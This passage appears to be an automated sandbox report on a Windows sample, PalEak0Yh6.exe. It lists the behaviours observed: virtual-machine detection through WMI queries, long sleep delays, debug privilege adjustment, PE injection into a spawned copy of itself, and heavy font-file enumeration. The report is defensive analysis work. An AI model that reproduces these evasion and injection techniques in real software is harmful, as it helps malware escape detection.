                  Source: unknownNetwork traffic detected: HTTP traffic on port 55615 -> 49723
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                  Malware Analysis System Evasion

                  barindex
                  Yara detected AntiVM3
                  Source: Yara matchFile source: Process Memory Space: PalEak0Yh6.exe PID: 7800, type: MEMORYSTR
                  Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
                  Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeMemory allocated: BE0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeMemory allocated: 2810000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeMemory allocated: 4810000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeMemory allocated: 8BA0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeMemory allocated: 75E0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeMemory allocated: 9BA0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeMemory allocated: ABA0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeMemory allocated: E30000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeMemory allocated: 2AA0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeMemory allocated: 2830000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeWindow / User API: threadDelayed 3023Jump to behavior
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeWindow / User API: threadDelayed 6395Jump to behavior
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exe TID: 7820Thread sleep time: -922337203685477s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exe TID: 2672Thread sleep time: -31359464925306218s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exe TID: 8100Thread sleep time: -30000s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exe TID: 8064Thread sleep time: -922337203685477s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: PalEak0Yh6.exe, 00000004.00000002.1362396894.0000000000F33000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeProcess information queried: ProcessInformationJump to behavior
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeMemory allocated: page read and write | page guardJump to behavior

                  HIPS / PFW / Operating System Protection Evasion

                  barindex
                  Injects a PE file into a foreign processes
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeMemory written: C:\Users\user\Desktop\PalEak0Yh6.exe base: 400000 value starts with: 4D5AJump to behavior
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeProcess created: C:\Users\user\Desktop\PalEak0Yh6.exe "C:\Users\user\Desktop\PalEak0Yh6.exe"Jump to behavior
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeProcess created: C:\Users\user\Desktop\PalEak0Yh6.exe "C:\Users\user\Desktop\PalEak0Yh6.exe"Jump to behavior
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeProcess created: C:\Users\user\Desktop\PalEak0Yh6.exe "C:\Users\user\Desktop\PalEak0Yh6.exe"Jump to behavior
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeQueries volume information: C:\Users\user\Desktop\PalEak0Yh6.exe VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeQueries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeQueries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeQueries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeQueries volume information: C:\Windows\Fonts\Candaral.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeQueries volume information: C:\Windows\Fonts\Candarali.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeQueries volume information: C:\Windows\Fonts\corbell.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeQueries volume information: C:\Windows\Fonts\corbelli.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeQueries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeQueries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeQueries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeQueries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeQueries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PalEak0Yh6.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformationJump to behavior
